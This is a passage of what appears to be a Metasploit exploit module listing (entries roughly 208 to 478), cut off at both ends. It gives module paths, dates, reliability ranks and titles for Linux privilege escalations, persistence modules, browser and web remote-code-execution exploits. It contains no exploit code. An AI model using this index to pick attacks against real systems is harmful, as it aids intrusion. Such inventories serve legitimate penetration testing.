2017-04-13 excellent Yes Juju-run Agent Privilege Escalation + 209 linux/local/kloxo_lxsuexec 2012-09-18 excellent No Kloxo Local Privilege Escalation + 210 linux/local/lastore_daemon_dbus_priv_esc 2016-02-02 excellent Yes lastore-daemon D-Bus Privilege Escalation + 211 linux/local/libuser_roothelper_priv_esc 2015-07-24 great Yes Libuser roothelper Privilege Escalation + 212 linux/local/nested_namespace_idmap_limit_priv_esc 2018-11-15 great Yes Linux Nested User Namespace idmap Limit Local Privilege Escalation + 213 linux/local/netfilter_priv_esc_ipv4 2016-06-03 good Yes Linux Kernel 4.6.3 Netfilter Privilege Escalation + 214 linux/local/network_manager_vpnc_username_priv_esc 2018-07-26 excellent Yes Network Manager VPNC Username Privilege Escalation + 215 linux/local/ntfs3g_priv_esc 2017-01-05 good Yes Debian/Ubuntu ntfs-3g Local Privilege Escalation + 216 linux/local/overlayfs_priv_esc 2015-06-16 good Yes Overlayfs Privilege Escalation + 217 linux/local/pkexec 2011-04-01 great Yes Linux PolicyKit Race Condition Privilege Escalation + 218 linux/local/rc_local_persistence 1980-10-01 excellent No rc.local Persistence + 219 linux/local/rds_priv_esc 2010-10-20 great Yes Reliable Datagram Sockets (RDS) Privilege Escalation + 220 linux/local/recvmmsg_priv_esc 2014-02-02 good Yes Linux Kernel recvmmsg Privilege Escalation + 221 linux/local/service_persistence 1983-01-01 excellent No Service Persistence + 222 linux/local/sock_sendpage 2009-08-13 great Yes Linux Kernel Sendpage Local Privilege Escalation + 223 linux/local/sophos_wpa_clear_keys 2013-09-06 excellent Yes Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation + 224 linux/local/systemtap_modprobe_options_priv_esc 2010-11-17 excellent Yes SystemTap MODPROBE_OPTIONS Privilege Escalation + 225 linux/local/udev_netlink 2009-04-16 great No Linux udev Netlink Local Privilege Escalation + 226 linux/local/ueb_bpserverd_privesc 2018-03-14 excellent No Unitrends Enterprise Backup bpserverd Privilege Escalation + 227 linux/local/ufo_privilege_escalation 2017-08-10 good Yes Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation + 228 linux/local/vmware_alsa_config 2017-05-22 excellent Yes VMware Workstation ALSA Config File Local Privilege Escalation + 229 linux/local/vmware_mount 2013-08-22 excellent Yes VMWare Setuid vmware-mount Unsafe popen(3) + 230 linux/local/yum_package_manager_persistence 2003-12-17 excellent No Yum Package Manager Persistence + 231 linux/local/zpanel_zsudo 2013-06-07 excellent Yes ZPanel zsudo Local Privilege Escalation Exploit + 232 linux/misc/accellion_fta_mpipe2 2011-02-07 excellent No Accellion FTA MPIPE2 Command Execution + 233 linux/misc/asus_infosvr_auth_bypass_exec 2015-01-04 excellent No ASUS infosvr Auth Bypass Command Execution + 234 linux/misc/drb_remote_codeexec 2011-03-23 excellent No Distributed Ruby Remote Code Execution + 235 linux/misc/gld_postfix 2005-04-12 good No GLD (Greylisting Daemon) Postfix Buffer Overflow + 236 linux/misc/hid_discoveryd_command_blink_on_unauth_rce 2016-03-28 excellent Yes HID discoveryd command_blink_on Unauthenticated RCE + 237 linux/misc/hikvision_rtsp_bof 2014-11-19 normal No Hikvision DVR RTSP Request Remote Code Execution + 238 linux/misc/hp_data_protector_cmd_exec 2011-02-07 excellent No HP Data Protector 6 EXEC_CMD Remote Code Execution + 239 linux/misc/hp_jetdirect_path_traversal 2017-04-05 normal No HP Jetdirect Path Traversal Arbitrary Code Execution + 240 linux/misc/hp_nnmi_pmd_bof 2014-09-09 normal Yes HP Network Node Manager I PMD Buffer Overflow + 241 linux/misc/hp_vsa_login_bof 2013-06-28 normal Yes HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow + 242 linux/misc/hplip_hpssd_exec 2007-10-04 excellent No HPLIP hpssd.py From Address Arbitrary Command Execution + 243 linux/misc/ib_inet_connect 2007-10-03 good No Borland InterBase INET_connect() Buffer Overflow + 244 linux/misc/ib_jrd8_create_database 2007-10-03 good No Borland InterBase jrd8_create_database() Buffer Overflow + 245 linux/misc/ib_open_marker_file 2007-10-03 good No Borland InterBase open_marker_file() Buffer Overflow + 246 linux/misc/ib_pwd_db_aliased 2007-10-03 good No Borland InterBase PWD_db_aliased() Buffer Overflow + 247 linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability + 248 linux/misc/jenkins_ldap_deserialize 2016-11-16 excellent Yes Jenkins CLI HTTP Java Deserialization Vulnerability + 249 linux/misc/lprng_format_string 2000-09-25 normal No LPRng use_syslog Remote Format String Vulnerability + 250 linux/misc/mongod_native_helper 2013-03-24 normal No MongoDB nativeHelper.apply Remote Code Execution + 251 linux/misc/nagios_nrpe_arguments 2013-02-21 excellent Yes Nagios Remote Plugin Executor Arbitrary Command Execution + 252 linux/misc/netcore_udp_53413_backdoor 2014-08-25 normal Yes Netcore Router Udp 53413 Backdoor + 253 linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow + 254 linux/misc/novell_edirectory_ncp_bof 2012-12-12 normal Yes Novell eDirectory 8 Buffer Overflow + 255 linux/misc/opennms_java_serialize 2015-11-06 normal No OpenNMS Java Object Unserialization Remote Code Execution + 256 linux/misc/qnap_transcode_server 2017-08-06 excellent Yes QNAP Transcode Server Command Execution + 257 linux/misc/quest_pmmasterd_bof 2017-04-09 normal Yes Quest Privilege Manager pmmasterd Buffer Overflow + 258 linux/misc/sercomm_exec 2013-12-31 great Yes SerComm Device Remote Code Execution + 259 linux/misc/ueb9_bpserverd 2017-08-08 excellent Yes Unitrends UEB bpserverd authentication bypass RCE + 260 linux/misc/zabbix_server_exec 2009-09-10 excellent Yes Zabbix Server Arbitrary Command Execution + 261 linux/mysql/mysql_yassl_getname 2010-01-25 good No MySQL yaSSL CertDecoder::GetName Buffer Overflow + 262 linux/mysql/mysql_yassl_hello 2008-01-04 good No MySQL yaSSL SSL Hello Message Buffer Overflow + 263 linux/pop3/cyrus_pop3d_popsubfolders 2006-05-21 normal No Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow + 264 linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution + 265 linux/pptp/poptop_negative_read 2003-04-09 great Yes Poptop Negative Read Overflow + 266 linux/proxy/squid_ntlm_authenticate 2004-06-08 great No Squid NTLM Authenticate Overflow + 267 linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86) + 268 linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load + 269 linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow + 270 linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow + 271 linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86) + 272 linux/smtp/exim4_dovecot_exec 2013-05-03 excellent No Exim and Dovecot Insecure Configuration Command Injection + 273 linux/smtp/exim_gethostbyname_bof 2015-01-27 great Yes Exim GHOST (glibc gethostbyname) Buffer Overflow + 274 linux/smtp/haraka 2017-01-26 excellent Yes Haraka SMTP Command Injection + 275 linux/ssh/ceragon_fibeair_known_privkey 2015-04-01 excellent No Ceragon FibeAir IP-10 SSH Private Key Exposure + 276 linux/ssh/exagrid_known_privkey 2016-04-07 excellent No ExaGrid Known SSH Key and Default Password + 277 linux/ssh/f5_bigip_known_privkey 2012-06-11 excellent No F5 BIG-IP SSH Private Key Exposure + 278 linux/ssh/loadbalancerorg_enterprise_known_privkey 2014-03-17 excellent No Loadbalancer.org Enterprise VA SSH Private Key Exposure + 279 linux/ssh/mercurial_ssh_exec 2017-04-18 excellent No Mercurial Custom hg-ssh Wrapper Remote Code Exec + 280 linux/ssh/quantum_dxi_known_privkey 2014-03-17 excellent No Quantum DXi V1000 SSH Private Key Exposure + 281 linux/ssh/quantum_vmpro_backdoor 2014-03-17 excellent No Quantum vmPRO Backdoor Command + 282 linux/ssh/solarwinds_lem_exec 2017-03-17 excellent No SolarWind LEM Default SSH Password Remote Code Execution + 283 linux/ssh/symantec_smg_ssh 2012-08-27 excellent No Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability + 284 linux/ssh/ubiquiti_airos_file_upload 2016-02-13 excellent No Ubiquiti airOS Arbitrary File Upload + 285 linux/ssh/vmware_vdp_known_privkey 2016-12-20 excellent No VMware VDP Known SSH Key + 286 linux/telnet/netgear_telnetenable 2009-10-30 excellent Yes NETGEAR TelnetEnable + 287 linux/telnet/telnet_encrypt_keyid 2011-12-23 great No Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow + 288 linux/upnp/belkin_wemo_upnp_exec 2014-04-04 excellent Yes Belkin Wemo UPnP Remote Code Execution + 289 linux/upnp/dlink_upnp_msearch_exec 2013-02-01 excellent Yes D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection + 290 linux/upnp/miniupnpd_soap_bof 2013-03-27 normal Yes MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution + 291 mainframe/ftp/ftp_jcl_creds 2013-05-12 normal Yes FTP JCL Execution + 292 multi/browser/adobe_flash_hacking_team_uaf 2015-07-06 great No Adobe Flash Player ByteArray Use After Free + 293 multi/browser/adobe_flash_nellymoser_bof 2015-06-23 great No Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow + 294 multi/browser/adobe_flash_net_connection_confusion 2015-03-12 great No Adobe Flash Player NetConnection Type Confusion + 295 multi/browser/adobe_flash_opaque_background_uaf 2015-07-06 great No Adobe Flash opaqueBackground Use After Free + 296 multi/browser/adobe_flash_pixel_bender_bof 2014-04-28 great No Adobe Flash Player Shader Buffer Overflow + 297 multi/browser/adobe_flash_shader_drawing_fill 2015-05-12 great No Adobe Flash Player Drawing Fill Shader Memory Corruption + 298 multi/browser/adobe_flash_shader_job_overflow 2015-05-12 great No Adobe Flash Player ShaderJob Buffer Overflow + 299 multi/browser/adobe_flash_uncompress_zlib_uaf 2014-04-28 great No Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free + 300 multi/browser/firefox_escape_retval 2009-07-13 normal No Firefox 3.5 escape() Return Value Memory Corruption + 301 multi/browser/firefox_pdfjs_privilege_escalation 2015-03-31 manual No Firefox PDF.js Privileged Javascript Injection + 302 multi/browser/firefox_proto_crmfrequest 2013-08-06 excellent No Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution + 303 multi/browser/firefox_proxy_prototype 2014-01-20 manual No Firefox Proxy Prototype Privileged Javascript Injection + 304 multi/browser/firefox_queryinterface 2006-02-02 normal No Firefox location.QueryInterface() Code Execution + 305 multi/browser/firefox_svg_plugin 2013-01-08 excellent No Firefox 17.0.1 Flash Privileged Code Injection + 306 multi/browser/firefox_tostring_console_injection 2013-05-14 excellent No Firefox toString console.time Privileged Javascript Injection + 307 multi/browser/firefox_webidl_injection 2014-03-17 excellent No Firefox WebIDL Privileged Javascript Injection + 308 multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution + 309 multi/browser/itms_overflow 2009-06-01 great No Apple OS X iTunes 8.1.1 ITMS Overflow + 310 multi/browser/java_atomicreferencearray 2012-02-14 excellent No Java AtomicReferenceArray Type Violation Vulnerability + 311 multi/browser/java_calendar_deserialize 2008-12-03 excellent No Sun Java Calendar Deserialization Privilege Escalation + 312 multi/browser/java_getsoundbank_bof 2009-11-04 great No Sun Java JRE getSoundbank file:// URI Buffer Overflow + 313 multi/browser/java_jre17_driver_manager 2013-01-10 excellent No Java Applet Driver Manager Privileged toString() Remote Code Execution + 314 multi/browser/java_jre17_exec 2012-08-26 excellent No Java 7 Applet Remote Code Execution + 315 multi/browser/java_jre17_glassfish_averagerangestatisticimpl 2012-10-16 excellent No Java Applet AverageRangeStatisticImpl Remote Code Execution + 316 multi/browser/java_jre17_jaxws 2012-10-16 excellent No Java Applet JAX-WS Remote Code Execution + 317 multi/browser/java_jre17_jmxbean 2013-01-10 excellent No Java Applet JMX Remote Code Execution + 318 multi/browser/java_jre17_jmxbean_2 2013-01-19 excellent No Java Applet JMX Remote Code Execution + 319 multi/browser/java_jre17_method_handle 2012-10-16 excellent No Java Applet Method Handle Remote Code Execution + 320 multi/browser/java_jre17_provider_skeleton 2013-06-18 great No Java Applet ProviderSkeleton Insecure Invoke Method + 321 multi/browser/java_jre17_reflection_types 2013-01-10 excellent No Java Applet Reflection Type Confusion Remote Code Execution + 322 multi/browser/java_rhino 2011-10-18 excellent No Java Applet Rhino Script Engine Remote Code Execution + 323 multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation + 324 multi/browser/java_setdifficm_bof 2009-11-04 great No Sun Java JRE AWT setDiffICM Buffer Overflow + 325 multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution + 326 multi/browser/java_storeimagearray 2013-08-12 great No Java storeImageArray() Invalid Array Indexing Vulnerability + 327 multi/browser/java_trusted_chain 2010-03-31 excellent No Java Statement.invoke() Trusted Method Chain Privilege Escalation + 328 multi/browser/java_verifier_field_access 2012-06-06 excellent No Java Applet Field Bytecode Verifier Cache Remote Code Execution + 329 multi/browser/mozilla_compareto 2005-07-13 normal No Mozilla Suite/Firefox compareTo() Code Execution + 330 multi/browser/mozilla_navigatorjava 2006-07-25 normal No Mozilla Suite/Firefox Navigator Object Code Execution + 331 multi/browser/msfd_rce_browser 2018-04-11 normal No Metasploit msfd Remote Code Execution via Browser + 332 multi/browser/opera_configoverwrite 2007-03-05 excellent No Opera 9 Configuration Overwrite + 333 multi/browser/opera_historysearch 2008-10-23 excellent No Opera historysearch XSS + 334 multi/browser/qtjava_pointer 2007-04-23 excellent No Apple QTJava toQTPointer() Arbitrary Memory Access + 335 multi/elasticsearch/script_mvel_rce 2013-12-09 excellent Yes ElasticSearch Dynamic Script Arbitrary Java Execution + 336 multi/elasticsearch/search_groovy_script 2015-02-11 excellent Yes ElasticSearch Search Groovy Sandbox Bypass + 337 multi/fileformat/adobe_u3d_meshcont 2009-10-13 good No Adobe U3D CLODProgressiveMeshDeclaration Array Overrun + 338 multi/fileformat/evince_cbt_cmd_injection 2017-07-13 excellent No Evince CBT File Command Injection + 339 multi/fileformat/ghostscript_failed_restore 2018-08-21 excellent No Ghostscript Failed Restore Command Execution + 340 multi/fileformat/js_unpacker_eval_injection 2015-02-18 excellent No Javascript Injection for Eval-based Unpackers + 341 multi/fileformat/libreoffice_macro_exec 2018-10-18 normal No LibreOffice Macro Code Execution + 342 multi/fileformat/maple_maplet 2010-04-26 excellent No Maple Maplet File Creation and Command Execution + 343 multi/fileformat/nodejs_js_yaml_load_code_exec 2013-06-28 excellent No Nodejs js-yaml load() Code Execution + 344 multi/fileformat/office_word_macro 2012-01-10 excellent No Microsoft Office Word Malicious Macro Execution + 345 multi/fileformat/peazip_command_injection 2009-06-05 excellent No PeaZip Zip Processing Command Injection + 346 multi/fileformat/swagger_param_inject 2016-06-23 excellent No JSON Swagger CodeGen Parameter Injector + 347 multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock) + 348 multi/ftp/wuftpd_site_exec_format 2000-06-22 great Yes WU-FTPD SITE EXEC/INDEX Format String Vulnerability + 349 multi/gdb/gdb_server_exec 2014-08-24 great No GDB Server Remote Payload Execution + 350 multi/hams/steamed 2018-04-01 manual No Steamed Hams + 351 multi/handler manual No Generic Payload Handler + 352 multi/http/activecollab_chat 2012-05-30 excellent Yes Active Collab "chat module" Remote PHP Code Injection Exploit + 353 multi/http/ajaxplorer_checkinstall_exec 2010-04-04 excellent Yes AjaXplorer checkInstall.php Remote Command Execution + 354 multi/http/apache_activemq_upload_jsp 2016-06-01 excellent No ActiveMQ web shell upload + 355 multi/http/apache_jetspeed_file_upload 2016-03-06 manual No Apache Jetspeed Arbitrary File Upload + 356 multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock) + 357 multi/http/apache_roller_ognl_injection 2013-10-31 excellent Yes Apache Roller OGNL Injection + 358 multi/http/apprain_upload_exec 2012-01-19 excellent Yes appRain CMF Arbitrary PHP File Upload Vulnerability + 359 multi/http/atutor_sqli 2016-03-01 excellent Yes ATutor 2.2.1 SQL Injection / Remote Code Execution + 360 multi/http/auxilium_upload_exec 2012-09-14 excellent Yes Auxilium RateMyPet Arbitrary File Upload Vulnerability + 361 multi/http/axis2_deployer 2010-12-30 excellent No Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP) + 362 multi/http/bassmaster_js_injection 2016-11-01 excellent Yes Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution + 363 multi/http/bolt_file_upload 2015-08-17 excellent Yes CMS Bolt File Upload Vulnerability + 364 multi/http/builderengine_upload_exec 2016-09-18 excellent Yes BuilderEngine Arbitrary File Upload Vulnerability and execution + 365 multi/http/caidao_php_backdoor_exec 2015-10-27 excellent Yes China Chopper Caidao PHP Backdoor Code Execution + 366 multi/http/cisco_dcnm_upload 2013-09-18 excellent Yes Cisco Prime Data Center Network Manager Arbitrary File Upload + 367 multi/http/clipbucket_fileupload_exec 2018-03-03 excellent Yes ClipBucket beats_uploader Unauthenticated Arbitrary File Upload + 368 multi/http/cmsms_showtime2_rce 2019-03-11 normal Yes CMS Made Simple (CMSMS) Showtime2 File Upload RCE + 369 multi/http/cmsms_upload_rename_rce 2018-07-03 excellent Yes CMS Made Simple Authenticated RCE via File Upload/Copy + 370 multi/http/coldfusion_ckeditor_file_upload 2018-09-11 excellent No Adobe ColdFusion CKEditor unrestricted file upload + 371 multi/http/coldfusion_rds 2013-08-08 great Yes Adobe ColdFusion 9 Administrative Login Bypass + 372 multi/http/confluence_widget_connector 2019-03-25 excellent Yes Atlassian Confluence Widget Connector Macro Velocity Template Injection + 373 multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock) + 374 multi/http/cuteflow_upload_exec 2012-07-27 excellent Yes CuteFlow v2.11.2 Arbitrary File Upload Vulnerability + 375 multi/http/dexter_casinoloader_exec 2014-02-08 excellent Yes Dexter (CasinoLoader) SQL Injection + 376 multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection + 377 multi/http/eaton_nsm_code_exec 2012-06-26 excellent Yes Network Shutdown Module (sort_values) Remote PHP Code Injection + 378 multi/http/eventlog_file_upload 2014-08-31 excellent Yes ManageEngine Eventlog Analyzer Arbitrary File Upload + 379 multi/http/extplorer_upload_exec 2012-12-31 excellent Yes eXtplorer v2.1 Arbitrary File Upload Vulnerability + 380 multi/http/familycms_less_exec 2011-11-29 excellent Yes Family Connections less.php Remote Command Execution + 381 multi/http/freenas_exec_raw 2010-11-06 great No FreeNAS exec_raw.php Arbitrary Command Execution + 382 multi/http/gestioip_exec 2013-10-04 excellent No GestioIP Remote Command Execution + 383 multi/http/getsimplecms_unauth_code_exec 2019-04-28 excellent Yes GetSimpleCMS Unauthenticated RCE + 384 multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390 + 385 multi/http/git_submodule_command_exec 2017-08-10 excellent No Malicious Git HTTP Server For CVE-2017-1000117 + 386 multi/http/git_submodule_url_exec 2018-10-05 excellent No Malicious Git HTTP Server For CVE-2018-17456 + 387 multi/http/gitlab_shell_exec 2013-11-04 excellent Yes Gitlab-shell Code Execution + 388 multi/http/gitlist_arg_injection 2018-04-26 excellent Yes GitList v0.6.0 Argument Injection Vulnerability + 389 multi/http/gitorious_graph 2012-01-19 excellent No Gitorious Arbitrary Command Execution + 390 multi/http/glassfish_deployer 2011-08-04 excellent No Sun/Oracle GlassFish Server Authenticated Code Execution + 391 multi/http/glossword_upload_exec 2013-02-05 excellent Yes Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability + 392 multi/http/glpi_install_rce 2013-09-12 manual Yes GLPI install.php Remote Command Execution + 393 multi/http/horde_form_file_upload 2019-03-24 excellent No Horde Form File Upload Vulnerability + 394 multi/http/horde_href_backdoor 2012-02-13 excellent No Horde 3.3.12 Backdoor Arbitrary PHP Code Execution + 395 multi/http/hp_sitescope_issuesiebelcmd 2013-10-30 great Yes HP SiteScope issueSiebelCmd Remote Code Execution + 396 multi/http/hp_sitescope_uploadfileshandler 2012-08-29 good No HP SiteScope Remote Code Execution + 397 multi/http/hp_sys_mgmt_exec 2013-06-11 excellent Yes HP System Management Homepage JustGetSNMPQueue Command Injection + 398 multi/http/hyperic_hq_script_console 2013-10-10 excellent Yes VMware Hyperic HQ Groovy Script-Console Java Execution + 399 multi/http/ibm_openadmin_tool_soap_welcomeserver_exec 2017-05-30 excellent Yes IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution + 400 multi/http/ispconfig_php_exec 2013-10-30 excellent No ISPConfig Authenticated Arbitrary PHP Code Execution + 401 multi/http/jboss_bshdeployer 2010-04-26 excellent No JBoss JMX Console Beanshell Deployer WAR Upload and Deployment + 402 multi/http/jboss_deploymentfilerepository 2010-04-26 excellent No JBoss Java Class DeploymentFileRepository WAR Deployment + 403 multi/http/jboss_invoke_deploy 2007-02-20 excellent Yes JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) + 404 multi/http/jboss_maindeployer 2007-02-20 excellent No JBoss JMX Console Deployer Upload and Execute + 405 multi/http/jboss_seam_upload_exec 2010-08-05 normal Yes JBoss Seam 2 File Upload and Execute + 406 multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE + 407 multi/http/jenkins_script_console 2013-01-18 good Yes Jenkins-CI Script-Console Java Execution + 408 multi/http/jenkins_xstream_deserialize 2016-02-24 excellent Yes Jenkins XStream Groovy classpath Deserialization Vulnerability + 409 multi/http/jira_hipchat_template 2015-10-28 excellent Yes Atlassian HipChat for Jira Plugin Velocity Template Injection + 410 multi/http/jira_plugin_upload 2018-02-22 excellent Yes Atlassian Jira Authenticated Upload Code Execution + 411 multi/http/joomla_http_header_rce 2015-12-14 excellent Yes Joomla HTTP Header Unauthenticated Remote Code Execution + 412 multi/http/kordil_edms_upload_exec 2013-02-22 excellent Yes Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability + 413 multi/http/lcms_php_exec 2011-03-03 excellent Yes LotusCMS 3.0 eval() Remote Command Execution + 414 multi/http/log1cms_ajax_create_folder 2011-04-11 excellent Yes Log1 CMS writeInfo() PHP Code Injection + 415 multi/http/magento_unserialize 2016-05-17 excellent Yes Magento 2.0.6 Unserialize Remote Code Execution + 416 multi/http/makoserver_cmd_exec 2017-09-03 excellent Yes Mako Server v2.5, 2.6 OS Command Injection RCE + 417 multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection + 418 multi/http/manageengine_auth_upload 2014-12-15 excellent Yes ManageEngine Multiple Products Authenticated File Upload + 419 multi/http/manageengine_sd_uploader 2015-08-20 excellent Yes ManageEngine ServiceDesk Plus Arbitrary File Upload + 420 multi/http/manageengine_search_sqli 2012-10-18 excellent Yes ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection + 421 multi/http/mantisbt_manage_proj_page_rce 2008-10-16 excellent Yes Mantis manage_proj_page PHP Code Execution + 422 multi/http/mantisbt_php_exec 2014-11-08 great Yes MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability + 423 multi/http/mediawiki_syntaxhighlight 2017-04-06 good Yes MediaWiki SyntaxHighlight extension option injection vulnerability + 424 multi/http/mediawiki_thumb 2014-01-28 excellent Yes MediaWiki Thumb.php Remote Command Execution + 425 multi/http/metasploit_static_secret_key_base 2016-09-15 excellent Yes Metasploit Web UI Static secret_key_base Value + 426 multi/http/metasploit_webui_console_command_execution 2016-08-23 excellent No Metasploit Web UI Diagnostic Console Command Execution + 427 multi/http/mma_backdoor_upload 2012-04-02 excellent Yes Th3 MMA mma.php Backdoor Arbitrary File Upload + 428 multi/http/mobilecartly_upload_exec 2012-08-10 excellent Yes MobileCartly 1.0 Arbitrary File Creation Vulnerability + 429 multi/http/monstra_fileupload_exec 2017-12-18 excellent Yes Monstra CMS Authenticated Arbitrary File Upload + 430 multi/http/moodle_cmd_exec 2013-10-30 good No Moodle Remote Command Execution + 431 multi/http/movabletype_upgrade_exec 2013-01-07 excellent Yes Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution + 432 multi/http/mutiny_subnetmask_exec 2012-10-22 excellent Yes Mutiny Remote Command Execution + 433 multi/http/nas4free_php_exec 2013-10-30 great No NAS4Free Arbitrary Remote Code Execution + 434 multi/http/navigate_cms_rce 2018-09-26 excellent Yes Navigate CMS Unauthenticated Remote Code Execution + 435 multi/http/netwin_surgeftp_exec 2012-12-06 good Yes Netwin SurgeFTP Remote Command Execution + 436 multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability + 437 multi/http/novell_servicedesk_rce 2016-03-30 excellent Yes Novell ServiceDesk Authenticated File Upload + 438 multi/http/nuuo_nvrmini_upgrade_rce 2018-08-04 excellent Yes NUUO NVRmini upgrade_handle.php Remote Command Execution + 439 multi/http/op5_license 2012-01-05 excellent Yes OP5 license.php Remote Command Execution + 440 multi/http/op5_welcome 2012-01-05 excellent Yes OP5 welcome Remote Command Execution + 441 multi/http/openfire_auth_bypass 2008-11-10 excellent Yes Openfire Admin Console Authentication Bypass + 442 multi/http/openmediavault_cmd_exec 2013-10-30 excellent No OpenMediaVault Cron Remote Command Execution + 443 multi/http/openx_backdoor_php 2013-08-07 excellent Yes OpenX Backdoor PHP Code Execution + 444 multi/http/opmanager_socialit_file_upload 2014-09-27 excellent Yes ManageEngine OpManager and Social IT Arbitrary File Upload + 445 multi/http/oracle_ats_file_upload 2016-01-20 excellent Yes Oracle ATS Arbitrary File Upload + 446 multi/http/oracle_reports_rce 2014-01-15 great Yes Oracle Forms and Reports Remote Code Execution + 447 multi/http/oracle_weblogic_wsat_deserialization_rce 2017-10-19 excellent No Oracle WebLogic wls-wsat Component Deserialization RCE + 448 multi/http/orientdb_exec 2017-07-13 good Yes OrientDB 2.2.x Remote Code Execution + 449 multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution + 450 multi/http/pandora_upload_exec 2010-11-30 excellent Yes Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability + 451 multi/http/phoenix_exec 2016-07-01 excellent Yes Phoenix Exploit Kit Remote Code Execution + 452 multi/http/php_cgi_arg_injection 2012-05-03 excellent Yes PHP CGI Argument Injection + 453 multi/http/php_utility_belt_rce 2015-12-08 excellent Yes PHP Utility Belt Remote Code Execution + 454 multi/http/php_volunteer_upload_exec 2012-05-28 excellent No PHP Volunteer Management System v1.0.2 Arbitrary File Upload Vulnerability + 455 multi/http/phpfilemanager_rce 2015-08-28 excellent Yes phpFileManager 0.9.8 Remote Code Execution + 456 multi/http/phpldapadmin_query_engine 2011-10-24 excellent Yes phpLDAPadmin query_engine Remote PHP Code Injection + 457 multi/http/phpmailer_arg_injection 2016-12-26 manual No PHPMailer Sendmail Argument Injection + 458 multi/http/phpmoadmin_exec 2015-03-03 excellent Yes PHPMoAdmin 1.1.2 Remote Code Execution + 459 multi/http/phpmyadmin_3522_backdoor 2012-09-25 normal No phpMyAdmin 3.5.2.2 server_sync.php Backdoor + 460 multi/http/phpmyadmin_lfi_rce 2018-06-19 good Yes phpMyAdmin Authenticated Remote Code Execution + 461 multi/http/phpmyadmin_null_termination_exec 2016-06-23 excellent Yes phpMyAdmin Authenticated Remote Code Execution + 462 multi/http/phpmyadmin_preg_replace 2013-04-25 excellent Yes phpMyAdmin Authenticated Remote Code Execution via preg_replace() + 463 multi/http/phpscheduleit_start_date 2008-10-01 excellent Yes phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection + 464 multi/http/phptax_exec 2012-10-08 excellent Yes PhpTax pfilez Parameter Exec Remote Code Injection + 465 multi/http/phpwiki_ploticus_exec 2014-09-11 excellent No Phpwiki Ploticus Remote Code Execution + 466 multi/http/pimcore_unserialize_rce 2019-03-11 normal Yes Pimcore Unserialize RCE + 467 multi/http/playsms_filename_exec 2017-05-21 excellent Yes PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution + 468 multi/http/playsms_uploadcsv_exec 2017-05-21 excellent Yes PlaySMS import.php Authenticated CSV File Upload Code Execution + 469 multi/http/plone_popen2 2011-10-04 excellent Yes Plone and Zope XMLTools Remote Command Execution + 470 multi/http/pmwiki_pagelist 2011-11-09 excellent Yes PmWiki pagelist.php Remote PHP Code Injection Exploit + 471 multi/http/polarcms_upload_exec 2012-01-21 excellent Yes PolarBear CMS PHP File Upload Vulnerability + 472 multi/http/processmaker_exec 2013-10-24 excellent Yes ProcessMaker Open Source Authenticated PHP Code Execution + 473 multi/http/processmaker_plugin_upload 2010-08-25 excellent No ProcessMaker Plugin Upload + 474 multi/http/qdpm_upload_exec 2012-06-14 excellent Yes qdPM v7 Arbitrary PHP File Upload Vulnerability + 475 multi/http/rails_actionpack_inline_exec 2016-03-01 excellent No Ruby on Rails ActionPack Inline ERB Code Execution + 476 multi/http/rails_double_tap 2019-03-13 excellent Yes Ruby On Rails DoubleTap Development Mode secret_key_base Vulnerability + 477 multi/http/rails_dynamic_render_code_exec 2016-10-16 excellent Yes Ruby on Rails Dynamic Render File Upload Remote Code Execution + 478 multi/http/rails_json_yaml_code_exec 2013-01-28 excellent No Ruby on Rails JSON Processor YAML 